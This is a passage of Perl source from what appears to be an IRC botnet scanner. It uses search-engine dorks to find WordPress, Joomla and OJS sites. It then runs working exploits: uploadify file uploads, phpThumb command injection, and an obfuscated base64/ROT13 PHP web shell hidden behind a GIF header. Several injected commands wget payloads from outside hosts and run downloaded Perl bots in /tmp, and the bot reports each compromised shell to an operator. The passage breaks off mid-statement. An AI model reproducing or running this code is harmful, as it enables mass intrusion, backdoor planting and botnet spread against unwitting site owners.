} if ($engine =~ /askDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDK",$type,$nick); } exit; } } if ($engine =~ /yahoo2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo2",$type); } exit; } } if ($engine =~ /kvasir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KvaSiR"); } exit; } } if ($engine =~ /quint/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"QuinT",$type); } exit; } } if ($engine =~ /pagina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Pagina",$type); } exit; } } if ($engine =~ /clix/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clix",$type); } exit; } } if ($engine =~ /ask2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ask2",$type); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bing",$type,$nick); } exit; } } if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BigLobe",$type,$nick); } exit; } } if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WaLLa",$type,$nick); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YaHoo",$type,$nick); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsK",$type,$nick); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UoL",$type,$nick); } exit; } } if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OnEt",$type,$nick); } exit; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CLusTy",$type,$nick); } exit; } } if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SaPo",$type,$nick); } exit; } } if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AoL",$type,$nick); } exit; } } if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LyCos",$type,$nick); } exit; } } if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HotBot",$type,$nick); } exit; } } if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SeZNam",$type,$nick); } exit; } } } ######################################### Exploiting sub upl2_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $kontol = "http://".$site."/xmlrpc.php"; my $cek = &get_content($kontol); if ($cek =~ m/XML-RPC server accepts POST requests only/g) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &msg("$chanxxx","![9$engine]! 13$site"); &way2($site,$chan,$engine); } }exit;} } } } sub way2() { my $site = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $test = "http://".$site; my $control = &get_content($test);sleep(7); if ($control =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $sitex = $2; } if ($control =~ /\/wp-content\/themes\/(.*?)\//i){ $temane = $1; } my @temanes = ('ThisWay','thisway'); foreach my $temanex(@temanes){ my $bawere = "http://".$sitex."/wp-content/themes/".$temanex."/includes/uploadify/upload_background_thumb_thumb.php"; my $uagent = "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)"; my $ua = LWP::UserAgent->new; $ua->timeout(30); my $response = $ua->post( $bawere, Content_Type => 'form-data', Content => [ 'Filedata' => ['info.inc.gif' => 'info.php'] ] ); my $body = $response->content; if($body =~ m/"path":"(.*?)"}/g){ my $out = $1; $out =~ s/\\//g; my $out2 = "http://".$sitex."mils.php"; my $out3 = "http://".$sitex."wp-admin/includes/info.php"; my $semprot = &get_content($out); sleep(2); my $semprot2 = &get_content($out2); sleep(2); my $semprot3 = &get_content($out3); if ($semprot =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($semprot =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($semprot =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($semprot =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","11$engine theme: $temanex 4 $out 15$os $uid"); &msg("$channel","![9$engine]!4 Uname: 11$os $uid 12$temanex"); } if ($semprot2 =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($semprot2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($semprot2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($semprot2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","11$engine theme: $temanex 4 $out2 15$os $uid"); &msg("$channel","![9$engine]!4 Uname: 11$os $uid 2$temanex"); } if ($semprot3 =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($semprot3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($semprot3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($semprot3 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","11$engine theme: $temanex 4 $out3 15$os $uid"); &msg("$channel","![9$engine]!4 Uname: 11$os $uid 10$temanex"); } } } my $bawere2 = "http://".$sitex."/wp-content/themes/".$temane."/includes/uploadify/upload_settings_image.php"; my $itilx2 = &get_content($bawere2); sleep(3); if ($itilx2 =~ /{"status":"NOK", "ERR":"This file is incorect"}/i) { &msg("$chanxxx","![9$engine]! 10$baware2"); my $ua = LWP::UserAgent->new; $ua->timeout(30); my $response = $ua->post( $bawere, Content_Type => 'form-data', Content => [ 'Filedata' => ['info.inc.gif' => 'info.phtml'] ] ); my $bodyx = $response->content; if($bodyx =~ m/"path":"(.*?)"}/g){ my $out = $1; $out =~ s/\\//g; my $out2 = "http://".$sitex."mils.php"; my $out3 = "http://".$sitex."wp-admin/includes/info.php"; my $semprot = &get_content($out); sleep(2); my $semprot2 = &get_content($out2); sleep(2); my $semprot3 = &get_content($out3); if ($semprot =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($semprot =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($semprot =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($semprot =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","11$engine theme: $temane 4 $out 15$os $uid"); &msg("$channel","![9$engine]!4 Uname: 11$os $uid 12$temane"); } if ($semprot2 =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($semprot2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($semprot2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($semprot2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","11$engine theme: $temane 4 $out2 15$os $uid"); &msg("$channel","![9$engine]!4 Uname: 11$os $uid 2$temane"); } if ($semprot3 =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($semprot3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($semprot3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($semprot3 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","11$engine theme: $temane 4 $out3 15$os $uid"); &msg("$channel","![9$engine]!4 Uname: 11$os $uid 10$temane"); } } } } sub upl_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $target = "http://".$site; if ($target =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $sitex = $2; } my @temanes = ('ThisWay','thisway'); foreach my $temane(@temanes){ my $target = "http://".$sitex."/wp-content/themes/".$temane."/includes/uploadify/upload_background_thumb.php"; my $uagent = "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)"; my $ua = LWP::UserAgent->new; $ua->timeout(30); my $response = $ua->post($target, Content_Type => 'form-data', Content => [ 'Filedata' => ['info.inc.gif' => 'info.php'] ] ); my $body = $response->content; if($body =~ m/"path":"(.*?)"}/g){ my $shellku = $1; my $check = $ua->get("$shellku")->content; if($check =~/
/) { my $checkx = &get_content($shellku."?cek");sleep(2); if ($checkx =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($checkx =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($checkx =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($checkx =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9$engine]!4 Uname: 3$os "); sleep(5); &msg("$admin","$uplogo5[4-5=4[8$engine4]5=4-5] 4 $shellku 4[3$os4][3safemode10:3$safe4]"); sleep(3); } } my $shell = "http://".$sitex."/mils.php"; my $check2 = $ua->get("$shell")->content; if($check2 =~/
/) { my $checkx2 = &get_content($shell."?cek");sleep(2); if ($checkx2 =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($checkx2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($checkx2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($checkx2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9$engine]!4 Uname: 13$os "); sleep(5); &msg("$admin","$uplogo5[4-5=4[8$engine4]5=4-5] 4 $shell 4[3$os4][3safemode10:3$safe4]"); sleep(3); } } } } } } } sub pkp_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101Firefox/14.0.1'); my $shell = "wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.jpg"; #wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.php"; my $website = "http://".$site."lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; my $request = $agent->request(HTTP::Request->new(GET=>$website)); my $cwebsite = "http://".$site."lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/style.jpg"; my $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { my $mvwebsite = "http://".$site."lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv style.jpg style.php ; &phpThumbDebug=9"; my $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); my $xmlrpc = "http://".$site."lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/style.php"; my $c2req = $agent->request(HTTP::Request->new(GET=>$xmlrpc)); #&msg("$chanxxx","![7$engine]! [ 9".$site." ] "); sleep(3); my $check = &get_content($xmlrpc."?cek"); if ($check =~ m/404 Not Found/ig) { &msg("$channel","![7$engine]! [ 9UploAdinG 3Data ] "); sleep(2); my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","15(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("petology","15(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("$channel","![9$engine]! [ 3Target Sent To $nick 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15) ]"); } } my @bdpath = ( "lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/pagat.php", "lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/.grv.php", "lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/.inc.jpg", "lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/sem.php", "lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/dilan.php", ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { sleep(int(rand(3))); &msg("$channel","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","15[4+12$engine4+15] 11$result[0] OS: $result[1] SAFEMODE:4$result[2] "); } } } } sub portfolio_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101Firefox/14.0.1'); my $shell = "wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.jpg"; #wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.php"; my $website = "http://".$site."components/com_portfolio/includes/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; my $request = $agent->request(HTTP::Request->new(GET=>$website)); my $cwebsite = "http://".$site."components/com_portfolio/includes/phpthumb/style.jpg"; my $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { my $mvwebsite = "http://".$site."components/com_portfolio/includes/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv style.jpg style.php ; &phpThumbDebug=9"; my $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); my $xmlrpc = "http://".$site."components/com_portfolio/includes/phpthumb/style.php"; my $c2req = $agent->request(HTTP::Request->new(GET=>$xmlrpc)); #&msg("$chanxxx","![7$engine]! [ 9".$site." ] "); sleep(3); my $check = &get_content($xmlrpc."?cek"); if ($check =~ m/404 Not Found/ig) { &msg("$channel","![7$engine]! [ 9UploAdinG 3Data ] "); sleep(2); my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","15(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("petology","15(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("$channel","![9$engine]! [ 3Target Sent To $nick 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15) ]"); } } my @bdpath = ( "components/com_portfolio/includes/phpthumb/pagat.php", "components/com_portfolio/includes/phpthumb/.grv.php", "components/com_portfolio/includes/phpthumb/.inc.jpg", "components/com_portfolio/includes/phpthumb/sem.php", "components/com_portfolio/includes/phpthumb/dilan.php", ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { sleep(int(rand(3))); &msg("$channel","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","15[4+12$engine4+15] 11$result[0] OS: $result[1] SAFEMODE:4$result[2] ");} } } } sub shellx11() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $crota = "http://".$site."/style.php"; my $crotb = "http://".$site."/style.php"; &alpha_post21("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php);'); my $html = &get_content($crota."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); my $html2 = &get_content($crotb."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); if ($html =~ /GIF89a/) { &get_content($crota); sleep(3); my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [ 8SheLL 2Target Sent to 12$nick 9$safe $os ]"); &msg("$admin","$vdlogo 15$engine3 [Success]9 $crota 15(OS=$os) $uid "); sleep(2); } if ($html2 =~ /GIF89a/) { &get_content($crotb); my $safe = ""; my $os = ""; my $uid = ""; if ($html2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","15$engine9 $crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","![7$engine]! [ 4SheLL 7Target Sent to 4$nick 9$safe $os ]"); } } sub alpha_post21() { my $target = $_[0]; my $code = "R0lGODlhPD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KHN0cl9yb3QxMygnPThUK3RQVE5xOE5COEhSbVVSZkxzL1FoMWVJWkRlTWVhc1hmVjZDUUx1UDVFZWxsRHZxSmJrN0x4eGZXRncwYWloKy84MUhzV3JFcERlYnM5b2p4VytyQm1NVjB0K0Z0bjIxVE9TcUxOSXZBNURQQjdnemlOZkRuSnRaRnNKWW9CUDVVMjRNRFROKytZYnFtQVEvR3pkdVBtalVPTkpBWVNWMFZrUFZlM0RTR0x6ZGI2ZFdPK2dkZmE0cVFabk5BVHBqa1pTVEQ4Y1M2MFcvSHk5a2xmeHRTUkpiRmpjWmg0L3VEaHUyanRwK3VNL1huQXhLN2RGOWE2QitPbWJNTXdtSS9lWkp0cEtTOUNDTkMrQnZhSWRnYTJramhnZGNhMC9VSGNhcmdYSlhwNG1Ea0gzT0Jsalg5ZVkrOEthcEdsSm82R0szZDZzS0JiNXpHS2gwWDNoMmRRZEhuL2tjb24xaFFkTktORy8xR0JjMzVaalhjSkNlRkJpeWdWN3BRbEtjZzhiV3RLQ2tvaFdleGU2SXk3RW0zSTRIMjQvUVIwQy95M2VuWjgxOUxwbTVXZmZYblZCU3lDL1JndVVsTml2Q1M5b04wSHJkRW5JWWxqeFJXdUM5ZmRwZG81RXMyMW9nbnNPM3Bja0wxbDRhbjErTW1CTWxjSS9YdkZqQjc1ZGY3QW02ZWdJcW85ektsd1BxSTI5MEhaSmUyMU9JNnlCU3FENzc4bi9ES3Vwbktwc0x2R3JsbEFLbVVDeEpDK0M4ZTNnZElnN0dUSG1DSThmb1NsbWppcDBHWHhFK3lMclJMbnNuVEtCbkptcnAxWGRlRlVwaE1ldXhtaEtBWXBySmNlcjcybWNkVkd5emUvMW9BMEhzQjdtck1WRWM5Rno1NnhHVDg5M2Fweit0Y1VyajM2MTNFY3I2SmIxMHBuM2g2SGFkZlpzOU1rY1lJN0tnYzFONUQ3S1RYK3B6TXBybEZJM1V3dFg3enl6SWFnckZzVEh1Q20ya3Vzcm1DY25xOFFNOGMvcnBNWm1nKzYxVWNVM2RkQUVsNjJqSW42SWNwMmFuemliK215amYwb1orQ2dVNy9VeWdSc0RpbytYQXFvMzRZQTJ2SjNlemNyNjhKY0RrYy9yd3AwVExzbzhUMm5sQTlZM2VVejNrRzE3c3haUHNsb3M1MDdpQkJEV1NqL3FVTU1YbGorRE5QbTUrdVh2V2laWHlhNUhxdDdYcGlpR09hRjV4VitwSEFjVVZwZ0hVb3czc3dyTGRsSW1LWU1zSG56djJlZGI3V2tTSDBJTTl0KzQ4alhmQnFtOTRUNFMxYVFrNTVyT3VEK1FhemNvZUJpTnNjbURTckhkRTJ4Q1VBQWNFSkVmT0VDS0puUldoZmdsMEE2dHBBSlVMVjVsY3FLMnlDVFlGSEI2Z1VaVWxxQVBKa0pMcVFPRmFvNnF6aGNZTmJPMFdha0RZMVdBUFV2dVhhRTZ2NUhDUkVDSkVXRnR4NW8zTzJMNEtod0lKZmM1ZFBITFhmMjFPcVhKQkR2cXpSL3FFRDFtbkdGaFFMaFJwWTdRV3B4UmlmQ05BSlBkTXg5U1hFYVJpSjhqVUZUUkVTWnZvYUNVbERlbG9EYXhyUkIwVm9sdE91MjNKdEVEdVdvN2ZhZXVKcjMvZ3JLZkR0WEVMcWRsa1QzOFBJOWZzeWNhcWVVTWZTdTNFRWt0VjA4bFFLL3dEanYva1B2N1BnTGFtYjh2dWZoNEZXc2tJVXpub1JLU2pBM3RKMVBsTWVNclM2ci93V1dmdHYzYkRwZzFhQUJzSGorMEkwT1lHQ0JqQ1Rnc1ZWdksxcDNTUlRiTFNOTXBERWwzdm05b1JKdmt6VUNvWmxTL1JIK2pBNnBIUmpBeGc5b2pUU01JUVM0TzBwK21LdlBUdjljM3laMG1oUDYzdHVSeVdEc0ZGOGMzUHkyZ094U2lIZXUydzRJbVE3WjIwUnhvU09NTTAvWWhxaFJKaGlXRGJHWVppdlNRQkl0czBTZTFyQXc2VEphSkU2VHhRZUlXeXZMOXZqNVZQNjM5QUR0am55ZER5dWV1WWhNd3o3UFFyRFlpWHhUb09WYmpLVHZnalFraFNhZm5POUVnNlREZVBjTmVNS2tVZEJvVUNWcEFid1BhSEMwdXBvWFpkeVRQL3BNQWVOSVBWL1lQS3ZJYzZ2LzlIYkdBR2s2YlNlUFFWWEplaDVHYllYSHF4eVZOOGJRYVFoVEFwQmt6WnlPOWdWcElIeGkyQUlxUms1V0ljTFR0UE82RHVOV28rVlVscEluUzlWdVhRWlVRNXVpTlJXZWtodVZCbFQrMlFycGZrNGhqaG84TGJHUk5OM0tJTkJiZU1GQmZrMGZtdHFUbHBhTlJnVCtjV2toRzdwYnNUMm44RktnUW5uelFxaHNqSHp6dnBGb05YUnNtc1BMRy9Wd2tGdkZxbFEwYVhrd1BvSGpkUHd2ek1jK2xicCt5VjZFSjgrUFloaGZ4VjRNbkswZmZ4ejdBNkh6NEFUM241MHhZSmhIWUJEa1pLbFVaQkNyYnpXYk9VOUNIWk1laWsxaDFIaEt6UkJISFQ5UXE1U3ZzaE51NzJxdnBoeUxWYitSNTFEU3E5SHlXL0M4cVNVWE5vSkZIazVTRTY3WUwxMHhKS2drWHRBU0tMc0pIdkZJNjExZ2dodEhwOXNESEZ4Ly8yZ0RpcGhIQlh4end5SWdWQmwxSmZiWE9Gb3JoN1RCZ1BXR1RZSk9RNzBYc3QxbDBOSnBTNndEUHVPRzB2Z0ttRVN4d0tFU0hkUmt0ckI4QVdTUG45UUpUMEQwdTBNWDJHR2s2Znk4OGJIYkVCSmpMUHh4OTdNVG5yb0d2V2VubE84Z2tQSUpSK215QnlOeHN4Zzc0dCt6Z2Y5aHRha1puUkttUmxmSTMxTUJUU3BpRDB0VllpTjQ0R3U0dS92NUpyTEtCcnhrZ2JiSkZnYi9GemRHdE95VHdiNkp4YzZrUmdVZ0ZDZ1UwUXFLTXVnMG81aStrSWhsY0xoaWtjL3VPZmdhcU43K2ZFVkF1dnp2emh1d2hFV1RTRGtGcHZGNXJNWTlpb2pjWE1FRHY3ZXV0OFViS0VjWFZ4Zmh0cWs2Q05rcGtjWEE0cG1URHNWeW5peU5XU3I0ZHo0cDV2NXZTWXQyMDgzQmlxWC9DaWdDL0o3YzNXdXRUeXdUTU42UTJWdklEVkZKU01Zay9PUGtDbDU4Z0wybTYwYjZFbVcveWVNZXpvUUZCcmZGRnR0UnFQcXdYMGdkSzFUSTNlR3llWUVsZVU4SitwR1pWME5qUFdwY3F2N2dvWFR3U2k4dDRDUjFsVkd5WjFVMHZSQWprWXRpWXRHaktVZFZ4dWlFUitTY240cnZjaFMxYWtpRUhwNURMZVY0VS81bmdoZDZUdlc2aUhidjJrUktTUTNqbEZwTDRycWw0U1N1WHcrRzZHckdUWjFSbWdiRVlQNnFaTkpDTTJoUkozTmlHM1VwenY0d09iUHBPdUJoNm55cmppUnVMREtwSFVScFVDMzBJOUVOc09vZ0xlUTNiU0w5M0wwM1FoNWo2Z2t6RjA4S0RSbW8ydjRvU09UblZ6cmJkdklidWhOS2NjN1pYRmRQRTk1a01HcmYwa2Frak5MeW5WcDBQRnhUQ1NxQkpQUEV3TkF0RDhZRW90WkdMZ1BWZGhxUVgremRsajNPMXBBWDZYYmJNZXpmM1NwVnpHNTJSUVg2MWMrQTJCMCsyQlBpVVpna2FMOHFyaVVxZU0xbnA5ZW55N0s2cEVoRkdrOVp0SytZbWRSTnZYaGFNZEZ2bXVFYlcrN3RsUWFGbU1Ga0MyVnNna0FnaHFicWdMeHVjQ1hvV2JWSTFzUmM0VVIzRXpZbUNqaXp4dCtTZkF5UjBDRWhlOHRxMzk5TVAyck4vUjl0M1Uyb1Q2aEdBMHF1VnYvRDJjZlB5dEJzdzJsaUdCcDl5amsvaWlESnVaUkdwQ1IvUEU2MEdDcUFXU0pVKzJ1aTlDdCtDYzlpYnE0b3cvbTl5TDJVaGwveFI2M3BZNWF3MW5mRzlBTUhnc1FnVmJ3bVFsY3NhYmlzMFlDc2JhT2o3UzF0M1lhNnFsYlV2QnlORXVMdktxWXRDZ1Jib1lyTWRqR1VqbWJQejQxQWZidU1GbHF0Y1dDMFZ4dGFCNnQ3WXFDckJKamIwRmxOV0pBTXc0UVdBb0NPdDFVY3dJUVNlOXpIK1JoLy9WKzVDcnR4a2R3QzhqQ2tCMjN2NGNFK0ZpWGJUQTZxQ2J3eVZPdnpIcVlJS0k5SXVIUDZSdy9NemNXVG1veWhvbmx6VXQ1MW5yNlNoNERlcUVKcWtsd0J6SFpBNkFZaVpQVHFYYk9xR0JPMmlnY3dUM0dBNGlSTGdnSWN3SW0nKSkpKSk7DQo/Pg=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./style.php",['style.php'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub try_xpl() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [ 6Finish ]"); } my $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101Firefox/14.0.1'); my $shell = "wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.jpg;wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.php"; my $website = "http://".$site."mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; my $request = $agent->request(HTTP::Request->new(GET=>$website)); my $cwebsite = "http://".$site."mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/style.jpg"; my $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { my $mvwebsite = "http://".$site."mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv style.jpg style.php ; &phpThumbDebug=9"; my $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); my $cweb = 